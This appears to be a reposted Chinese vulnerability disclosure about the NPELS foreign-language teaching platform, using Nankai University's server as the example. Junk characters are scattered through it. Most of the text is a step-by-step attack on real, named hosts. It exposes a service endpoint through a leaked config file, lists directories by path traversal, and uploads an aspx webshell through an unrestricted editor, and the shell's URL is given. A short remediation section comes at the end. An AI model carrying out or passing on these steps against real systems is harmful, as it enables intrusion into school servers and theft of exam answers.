好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中) k' v v; `+ L: |- ?" \* G y
- v8 k$ Q, @ _# a
详细说明: t0 ?9 H. E" d. d# i# U
7 C ~ a$ @9 J8 x
以南开大学的为例: 5 Z. V6 u! g* _2 G+ x6 W
http://222.30.60.3/NPELS8 P' @$ U- e3 e& O5 p5 p+ u
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址2 P" P0 Q/ z7 B9 W/ d
<setting name="Update_CommonSvr_CommonService" serializeAs="String">1 U; Z( l6 Z! P! ~# q8 \3 A5 ]
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
* n+ v2 A! O% w, O</setting>
2 t8 B- E% _. Q) B8 Z$ o! p及版本号4 B1 d& A( G. [) Y3 g* n0 _
<add key="TVersion" value="1, 0, 0, 2187">) k# A) R, h8 B- r+ |
</add>
" t9 P8 P/ U2 k1 \5 ^. u" D, T, s k! Y直接访问
8 Z# u9 L$ u& X+ y) b4 dhttp://222.30.60.3/NPELS/CommonService.asmx
- h* z3 h G% L: P4 J使用GetTestClientFileList操作,直接 HTTP GET 列目录:) f3 j" E3 V a: y0 a: _
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
, h4 F; ~: i% u& D- u( W" I进一步列目录(返回的网页很大,可以直接 wget 下来)
/ u* S, e1 [3 v X0 P/ x( Ohttp://222.30.60.3/NPELS/CommonS ... List?version=../../* V0 @; q3 ]; ~& G& p
8 a; C' h" U; u) m; z7 G, h" i$ Z4 e
发现
! A J, N/ o2 c L, Thttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
+ Y4 e! N1 V4 n. r C可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头) E% U& l ^7 J& D& Y1 m
上传后继续列目录找到木马地址直接访问即可9 c* m8 U3 h! ~
# h9 j0 m3 p' \
OOXX
. @! G! |$ `0 }2 t
6 G; v* B: z2 G TGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法4 q- c" L& [* n8 q
漏洞证明:) C! y- J$ v$ p0 l E7 G
* o w. V6 s& J' R! U B5 k n7 N
列目录:
* e+ }% ^8 N, P% n4 {- u7 khttp://222.30.60.3/NPELS/CommonS ... List?version=../../+ _, N( f$ i w+ C
文件上传:
" R2 x5 I8 T; a3 N; H7 Q/ @http://222.30.60.3/npelsv/editor/editor.htm6 A* B7 W9 H( V. A
/ C- l; v3 L5 l9 }: ^- r% U
上传木马:
9 X8 w7 ]; |& }; B$ p6 N2 Y8 Phttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
$ G0 u* h* _3 f % Q" x7 x p( z: u
修复方案:% G: G( x! ?0 t9 k {
好像考试系统必须使用 CommonService.asmx7 h2 o/ M# r9 ?/ S
最好配置文件加密或者用别的方式不让它泄露出来
3 k# D4 N) j; h1 S5 M% u并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样* h) k* \- A) b
|